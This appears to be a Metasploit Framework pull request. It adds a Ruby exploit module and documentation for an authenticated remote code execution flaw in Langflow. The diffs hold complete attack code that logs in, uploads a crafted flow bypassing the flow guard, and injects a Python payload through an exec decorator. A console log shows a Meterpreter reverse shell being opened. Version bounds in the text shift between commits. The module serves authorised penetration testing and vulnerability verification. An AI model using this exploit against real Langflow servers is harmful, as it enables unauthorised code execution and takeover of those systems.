### PR TITLE
ENH: Exploit module for Langflow Authenticated RCE vulnerability CVE-2026-19295

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+Langflow versions 1.10.0 and below are susceptible to authenticated remote code execution.
+By saving a flow where `data.type` is empty, an authenticated user can bypass the flow guard and execute
+arbitrary Python code.
+
+The vulnerability affects:
+
+    * Langflow <= 1.10.0
+
+
+This module was successfully tested on:
+
+    * Langflow 1.10.0 installed with Docker
+
+
+### Installation
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.8.4) in your VM.
+   `docker pull langflowai/langflow:1.10.0`
+4. Start the langflow container.
+
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  -e LANGFLOW_SUPERUSER=root \
+  -e LANGFLOW_SUPERUSER_PASSWORD=root \
+  --restart unless-stopped \
+  langflowai/langflow:1.10.0 \
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_19295`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 
-Langflow versions 1.10.0 and below are susceptible to authenticated remote code execution.
+Langflow versions 1.11.1 and below are susceptible to authenticated remote code execution.
 By saving a flow where `data.type` is empty, an authenticated user can bypass the flow guard and execute
 arbitrary Python code.
 
 The vulnerability affects:
 
-    * Langflow <= 1.10.0
+    * Langflow <= 1.11.1
 
 
 This module was successfully tested on:
@@ -17,7 +17,7 @@ This module was successfully tested on:
 ### Installation
 1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
 2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
-3. Pull pre-built Langflow docker container (v1.8.4) in your VM.
+3. Pull pre-built Langflow docker container (v1.10.0) in your VM.
    `docker pull langflowai/langflow:1.10.0`
 4. Start the langflow container.
 

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
@@ -28,8 +28,9 @@ sudo docker run -d \
   -p 192.168.1.30:7860:7860 \
   -e LANGFLOW_SUPERUSER=root \
   -e LANGFLOW_SUPERUSER_PASSWORD=root \
-  --restart unless-stopped \
-  langflowai/langflow:1.10.0 \
+  -e LANGFLOW_AUTO_LOGIN=false \
+  -e LANGFLOW_ALLOW_CUSTOM_COMPONENTS=false \
+  langflowai/langflow:1.10.0
 ```
 
 ## Verification Steps

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19295.md
@@ -46,3 +46,22 @@ sudo docker run -d \
 
 ## Scenarios
 
+```
+msf > use exploit/multi/http/langflow_auth_rce_cve_2026_19295
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19295) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19295) > set USERNAME root
+USERNAME => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19295) > set PASSWORD root
+PASSWORD => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19295) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.10.0 detected, which appears vulnerable.
+[*] Payload sent successfully.
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:36926) at 2026-08-27 23:40:01 -0400
+
+meterpreter > 
+```

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -1,0 +1,248 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI authenticated RCE',
+        'Description' => %q{
+          Langflow versions 1.10.0 and below are susceptible to authenticated
+          remote code execution. By saving a flow where `data.type` is empty,
+          an authenticated user can bypass the flow guard and execute
+          arbitrary python code.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-19295'],
+          ['URL', 'https://www.ibm.com/support/pages/node/7284733']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-07-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        )
+      ]
+    )
+  end
+
+  def get_token(username, password)
+    data = { 'username' => username, 'password' => password }
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
+        'headers' => {
+          'Content-Type' => 'application/json'
+        },
+        'data' => data.to_json
+      }
+    )
+
+    return unless res&.code == 200
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['access_token']
+  end
+
+  def create_flow(token)
+    node_id = Rex::Text.rand_text_alpha(8)
+    component_display_name = Rex::Text.rand_text_alpha(5)
+    component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
+
+    output_display_name = Rex::Text.rand_text_alpha(5)
+    output_name = Rex::Text.rand_text_alpha(5).downcase
+    output_method = Rex::Text.rand_text_alpha(5).downcase
+
+    injected_code = "from lfx.custom.custom_component.component import Component\n" \
+                    "from lfx.io import Output\n" \
+                    "from lfx.schema.data import Data\n" \
+                    "\n" \
+                    "class #{component_name}(Component):\n" \
+                    "    display_name='#{component_display_name}'\n" \
+                    "    outputs=[Output(display_name='#{output_display_name}',name='#{output_name}',method='#{output_method}')]\n" \
+                    "    def #{output_method}(self)->Data:\n" \
+                    "        #{payload.encode.gsub("\n", "\n        ")}\n" \
+                    "        return Data(data={})\n"
+
+    crafted_flow = {
+      'name' => Rex::Text.rand_text_alpha(10),
+      'description' => Rex::Text.rand_text_alpha(10),
+      'data' => {
+        'nodes' => [
+          {
+            'id' => node_id,
+            'type' => 'genericNode',
+            'position' => {
+              'x' => 0,
+              'y' => 0
+            },
+            'data' => {
+              'id' => node_id,
+              'type' => '',
+              'node' => {
+                'template' => {
+                  '_type' => 'Component',
+                  'code' => {
+                    'type' => 'code',
+                    'required' => true,
+                    'show' => true,
+                    'multiline' => true,
+                    'value' => injected_code,
+                    'name' => 'code',
+                    'password' => false,
+                    'advanced' => false,
+                    'dynamic' => false
+                  }
+                },
+                'description' => 'Comp',
+                'base_classes' => ['Data'],
+                'display_name' => 'Comp',
+                'name' => 'Comp',
+                'frozen' => false,
+                'edited' => true,
+                'outputs' => [
+                  {
+                    'types' => ['Data'],
+                    'selected' => 'Data',
+                    'name' => 'o',
+                    'display_name' => 'O',
+                    'method' => 'r',
+                    'value' => '__UNDEFINED__',
+                    'cache' => true,
+                    'allows_loop' => false,
+                    'tool_mode' => false,
+                    'hidden' => nil,
+                    'required_inputs' => nil,
+                    'group_outputs' => false
+                  }
+                ],
+                'field_order' => ['code'],
+                'beta' => false
+              }
+            }
+          }
+        ],
+        'edges' => []
+      }
+    }
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/flows'),
+        'headers' => {
+          'Content-Type' => 'application/json',
+          'Authorization' => "Bearer #{token}"
+        },
+        'data' => crafted_flow.to_json
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res&.code&.between?(200, 299)
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['id']
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    version = Rex::Version.new(version_str.to_s)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    # Vulnerable version of Langflow
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version < Rex::Version.new('1.10.1')
+
+    # Patched version of Langflow
+    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    # Authenticate with Langflow
+    token = get_token(username, password)
+
+    if token.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
+    end
+
+    # Create flow to trigger vulnerability
+    flow_id = create_flow(token)
+
+    # Trigger vulnerability
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, "api/v1/#{flow_id}/flow"),
+        'headers' => {
+          'Content-Type' => 'application/json',
+          'Authorization' => "Bearer #{token}"
+        },
+        'data' => {}.to_json
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res&.code&.between?(200, 299)
+    print_status('Payload sent successfully.')
+  end
+end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI authenticated RCE',
         'Description' => %q{
-          Langflow versions 1.10.0 and below are susceptible to authenticated
+          Langflow versions 1.11.1 and below are susceptible to authenticated
           remote code execution. By saving a flow where `data.type` is empty,
           an authenticated user can bypass the flow guard and execute
           arbitrary Python code.
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
       "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
       "    @exec(\"#{payload.encode}\")",
       '    def r(self) -> Data:',
-      '        return Data(data={})\n',
+      '        return Data(data={})',
     ].join("\n")
 
     crafted_flow = {

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'BadChars' => '"'
         },
-        'DisclosureDate' => '2026-07-17',
+        'DisclosureDate' => '2026-08-28',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Langflow versions 1.10.0 and below are susceptible to authenticated
           remote code execution. By saving a flow where `data.type` is empty,
           an authenticated user can bypass the flow guard and execute
-          arbitrary python code.
+          arbitrary Python code.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -72,15 +72,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_token(username, password)
-    data = { 'username' => username, 'password' => password }
+    data = {
+      'username' => username,
+      'password' => password
+    }
 
     res = send_request_cgi(
-      {
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
-        'vars_post' => data
-      }
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
+      'vars_post' => data
     )
+
     return unless res&.code&.between?(200, 299)
 
     json = res.get_json_document
@@ -98,16 +100,17 @@ class MetasploitModule < Msf::Exploit::Remote
     output_name = Rex::Text.rand_text_alpha(5).downcase
     output_method = Rex::Text.rand_text_alpha(5).downcase
 
-    injected_code = "from lfx.custom.custom_component.component import Component\n" \
-                    "from lfx.io import Output\n" \
-                    "from lfx.schema.data import Data\n" \
-                    "\n" \
-                    "class #{component_name}(Component):\n" \
-                    "    display_name='#{component_display_name}'\n" \
-                    "    outputs=[Output(display_name='#{output_display_name}',name='#{output_name}',method='#{output_method}')]\n" \
-                    "    def #{output_method}(self)->Data:\n" \
-                    "        #{payload.encode.gsub("\n", "\n        ")}\n" \
-                    "        return Data(data={})\n"
+    injected_code = [
+      'from lfx.custom.custom_component.component import Component',
+      'from lfx.io import Output',
+      'from lfx.schema.data import Data',
+      "class #{component_name}(Component):",
+      "    display_name='#{component_display_name}'",
+      "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
+      "    @exec(\"#{payload.encode}\")",
+      '    def r(self) -> Data:',
+      '        return Data(data={})\n',
+    ].join("\n")
 
     crafted_flow = {
       'name' => Rex::Text.rand_text_alpha(10),
@@ -172,18 +175,18 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     res = send_request_cgi(
-      {
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
-        'headers' => {
-          'Content-Type' => 'application/json',
-          'Authorization' => "Bearer #{token}"
-        },
-        'data' => crafted_flow.to_json
-      }
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'Authorization' => "Bearer #{token}"
+      },
+      'data' => crafted_flow.to_json
     )
 
-    fail_with(Failure::UnexpectedReply, 'Unable to upload the vulnerable flow.') unless res&.code&.between?(200, 299)
+    unless res&.code&.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, 'Unable to upload the vulnerable flow.')
+    end
 
     json = res.get_json_document
     return unless json.is_a?(Hash)
@@ -193,33 +196,34 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      {
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
-      }
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
     )
 
     return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
 
     doc = res.get_json_document
+
     version_str = doc.is_a?(Hash) ? doc['version'] : nil
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
 
     package = doc.is_a?(Hash) ? doc['package'] : nil
     return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
-    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    unless package.to_s.downcase == 'langflow'
+      return Exploit::CheckCode::Safe('Application is not Langflow.')
+    end
 
     version = Rex::Version.new(version_str.to_s)
+
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
-    # Vulnerable version of Langflow
     if version < Rex::Version.new('1.10.1')
       return Exploit::CheckCode::Appears(
         "Version #{version} detected, which appears vulnerable."
       )
     end
 
-    # Patched version of Langflow
     Exploit::CheckCode::Safe(
       "Version #{version} detected, which is not vulnerable."
     )
@@ -229,30 +233,35 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    # Authenticate with Langflow
     token = get_token(username, password)
 
     if token.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
     end
 
-    # Create flow to trigger vulnerability
     flow_id = create_flow(token)
 
-    # Trigger vulnerability
+    if flow_id.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Langflow did not return a flow ID.')
+    end
+
     res = send_request_cgi(
-      {
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, "api/v1/build/#{flow_id}/flow"),
-        'headers' => {
-          'Content-Type' => 'application/json',
-          'Authorization' => "Bearer #{token}"
-        },
-        'data' => {}.to_json
-      }
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path,
+        "api/v1/build/#{flow_id}/flow"
+      ),
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'Authorization' => "Bearer #{token}"
+      },
+      'data' => {}.to_json
     )
 
-    fail_with(Failure::UnexpectedReply, 'Unable to trigger the vulnerability.') unless res&.code&.between?(200, 299)
+    unless res&.code&.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, 'Unable to trigger the vulnerability.')
+    end
+
     print_status('Payload sent successfully.')
   end
 end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2026-08-28',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [IOC_IN_LOGS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     json['access_token']
   end
 
-  def create_flow(token)
+  def create_flow
     node_id = Rex::Text.rand_text_alpha(8)
     component_display_name = Rex::Text.rand_text_alpha(5)
     component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
       'headers' => {
         'Content-Type' => 'application/json',
-        'Authorization' => "Bearer #{token}"
+        'Authorization' => "Bearer #{@token}"
       },
       'data' => crafted_flow.to_json
     )
@@ -230,19 +230,41 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def cleanup
+    super
+    return if @flow_id.to_s.empty? || @token.to_s.empty?
+
+    res = send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => normalize_uri(
+        target_uri.path,
+        "api/v1/flows/#{@flow_id}"
+      ),
+      'headers' => {
+        'Authorization' => "Bearer #{@token}"
+      }
+    )
+
+    if res&.code&.between?(200, 299)
+      print_good("Deleted malicious flow #{@flow_id}.")
+    else
+      print_warning("Failed to delete malicious flow #{@flow_id}.")
+    end
+  end
+
   def exploit
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    token = get_token(username, password)
+    @token = get_token(username, password)
 
-    if token.to_s.empty?
+    if @token.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
     end
 
-    flow_id = create_flow(token)
+    @flow_id = create_flow
 
-    if flow_id.to_s.empty?
+    if @flow_id.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Langflow did not return a flow ID.')
     end
 
@@ -250,11 +272,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(
         target_uri.path,
-        "api/v1/build/#{flow_id}/flow"
+        "api/v1/build/#{@flow_id}/flow"
       ),
       'headers' => {
         'Content-Type' => 'application/json',
-        'Authorization' => "Bearer #{token}"
+        'Authorization' => "Bearer #{@token}"
       },
       'data' => {}.to_json
     )

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -101,9 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
     output_method = Rex::Text.rand_text_alpha(5).downcase
 
     injected_code = [
-      'from lfx.custom.custom_component.component import Component',
-      'from lfx.io import Output',
-      'from lfx.schema.data import Data',
+      'from langflow.custom.custom_component.component import Component',
+      'from langflow.io import Output',
+      'from langflow.schema.data import Data',
       "class #{component_name}(Component):",
       "    display_name='#{component_display_name}'",
       "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
             },
             'data' => {
               'id' => node_id,
-              'type' => '',
+              'type' => 'CustomComponent',
               'node' => {
                 'template' => {
                   '_type' => 'Component',

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -152,9 +152,9 @@ class MetasploitModule < Msf::Exploit::Remote
                   {
                     'types' => ['Data'],
                     'selected' => 'Data',
-                    'name' => 'o',
-                    'display_name' => 'O',
-                    'method' => 'r',
+                    'name' => output_name,
+                    'display_name' => output_display_name,
+                    'method' => output_method,
                     'value' => '__UNDEFINED__',
                     'cache' => true,
                     'allows_loop' => false,

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -58,6 +58,14 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']
+        ),
+        OptString.new(
+          'USERNAME',
+          [true, 'Langflow login username', '']
+        ),
+        OptString.new(
+          'PASSWORD',
+          [true, 'Langflow login password', '']
         )
       ]
     )
@@ -70,14 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
-        'headers' => {
-          'Content-Type' => 'application/json'
-        },
-        'data' => data.to_json
+        'vars_post' => data
       }
     )
-
-    return unless res&.code == 200
+    return unless res&.code&.between?(200, 299)
 
     json = res.get_json_document
     return unless json.is_a?(Hash)
@@ -170,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'api/v1/flows'),
+        'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
         'headers' => {
           'Content-Type' => 'application/json',
           'Authorization' => "Bearer #{token}"
@@ -179,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res&.code&.between?(200, 299)
+    fail_with(Failure::UnexpectedReply, 'Unable to upload the vulnerable flow.') unless res&.code&.between?(200, 299)
 
     json = res.get_json_document
     return unless json.is_a?(Hash)
@@ -209,10 +213,16 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version < Rex::Version.new('1.10.1')
+    if version < Rex::Version.new('1.10.1')
+      return Exploit::CheckCode::Appears(
+        "Version #{version} detected, which appears vulnerable."
+      )
+    end
 
     # Patched version of Langflow
-    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
+    Exploit::CheckCode::Safe(
+      "Version #{version} detected, which is not vulnerable."
+    )
   end
 
   def exploit
@@ -233,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, "api/v1/#{flow_id}/flow"),
+        'uri' => normalize_uri(target_uri.path, "api/v1/build/#{flow_id}/flow"),
         'headers' => {
           'Content-Type' => 'application/json',
           'Authorization' => "Bearer #{token}"
@@ -242,7 +252,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Unexpected server reply.') unless res&.code&.between?(200, 299)
+    fail_with(Failure::UnexpectedReply, 'Unable to trigger the vulnerability.') unless res&.code&.between?(200, 299)
     print_status('Payload sent successfully.')
   end
 end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -218,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
-    if version < Rex::Version.new('1.10.1')
+    if version < Rex::Version.new('1.11.1')
       return Exploit::CheckCode::Appears(
         "Version #{version} detected, which appears vulnerable."
       )

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -100,8 +100,6 @@ class MetasploitModule < Msf::Exploit::Remote
     output_name = Rex::Text.rand_text_alpha(5).downcase
     output_method = Rex::Text.rand_text_alpha(5).downcase
 
-    _payload_b64 = Rex::Text.encode_base64(payload.encoded)
-
     injected_code = [
       'from langflow.custom import Component',
       'from langflow.io import Output',
@@ -129,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
             },
             'data' => {
               'id' => node_id,
-              'type' => 'CustomComponent',
+              'type' => '',
               'node' => {
                 'template' => {
                   '_type' => 'Component',
@@ -221,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
-    if version < Rex::Version.new('1.11.1')
+    if (version >= Rex::Version.new('1.0.0')) && (version <= Rex::Version.new('1.11.1'))
       return Exploit::CheckCode::Appears(
         "Version #{version} detected, which appears vulnerable."
       )

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -100,16 +100,19 @@ class MetasploitModule < Msf::Exploit::Remote
     output_name = Rex::Text.rand_text_alpha(5).downcase
     output_method = Rex::Text.rand_text_alpha(5).downcase
 
+    _payload_b64 = Rex::Text.encode_base64(payload.encoded)
+
     injected_code = [
-      'from langflow.custom.custom_component.component import Component',
+      'from langflow.custom import Component',
       'from langflow.io import Output',
       'from langflow.schema.data import Data',
+      '_fired = [False]',
       "class #{component_name}(Component):",
       "    display_name='#{component_display_name}'",
       "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
-      "    @exec(\"#{payload.encode}\")",
-      '    def r(self) -> Data:',
-      '        return Data(data={})',
+      "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
+      "    def #{output_method}(self) -> Data:",
+      '        return Data(data={})'
     ].join("\n")
 
     crafted_flow = {

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19295.rb
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
@@ -54,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']
@@ -92,6 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_flow
+    comp = Rex::Text.rand_text_alpha(8)
     node_id = Rex::Text.rand_text_alpha(8)
     component_display_name = Rex::Text.rand_text_alpha(5)
     component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
@@ -143,10 +144,10 @@ class MetasploitModule < Msf::Exploit::Remote
                     'dynamic' => false
                   }
                 },
-                'description' => 'Comp',
+                'description' => comp,
                 'base_classes' => ['Data'],
-                'display_name' => 'Comp',
-                'name' => 'Comp',
+                'display_name' => comp,
+                'name' => comp,
                 'frozen' => false,
                 'edited' => true,
                 'outputs' => [


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.10.0 and below.


**Related Issue:** 
Fixes #21836 

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_auth_rce_cve_2026_19295`
4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence
<img width="813" height="305" alt="image" src="https://github.com/user-attachments/assets/959467dc-91b5-456f-9e76-7b76260e3224" />



## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Ubuntu 22.04 |
| **Target Software/Hardware** | Langflow 1.10.0 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.10.0 |

## AI Usage Disclosure
None



## Pre-Submission Checklist
- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)